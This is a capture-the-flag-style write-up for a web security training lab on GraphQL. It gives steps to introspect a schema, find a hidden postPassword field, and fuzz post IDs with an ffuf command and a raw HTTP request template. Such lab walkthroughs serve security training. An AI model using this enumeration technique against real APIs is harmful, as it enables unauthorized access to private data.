GraphQL API vulnerabilities

Apprentice lab:
Accessing private GraphQL posts

• Solution

  1. View a random post.
  2. Observe the POST request made after clicking on a post, being a GraphQL endpoint.
  3. Run a full introspection query converting it to JSON using an online converter.
  4. Paste the response from the full introspection query into a GraphQL Visualizer.
  5. Notice there is a field postPassword.
  6. Add a postPassword field in the GraphQL query, notice the response will show the "postPassword":null.
  7. Fuzz for post id.
     ffuf -request request.txt -w range.txt -fr "null"
     request.txt

     POST https://uuid.web-security-academy.net/graphql/v1 HTTP/2.0
     user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
     accept: application/json
     accept-language: en-US,en;q=0.5
     accept-encoding: gzip, deflate, br, zstd
     referer: https://uuid.web-security-academy.net/post?postId=FUZZ
     content-type: application/json
     content-length: 285
     origin: https://uuid.web-security-academy.net
     cookie: session=3E9a6r6L5beUVP4B8Zn3WxYRbJM9ww67␍
     sec-fetch-dest: empty
     sec-fetch-mode: cors
     sec-fetch-site: same-origin
     priority: u=4
     te: trailers
     
     {
       "query": "\n    query getBlogPost($id: Int!) {\n        getBlogPost(id: $id) {\n            image\n            title\n            author\n            date\n            paragraphs\n        postPassword\n}\n    }",
       "operationName": "getBlogPost",
       "variables": {
         "id": FUZZ
       }
     }
     

  8. Submit post password to the lab.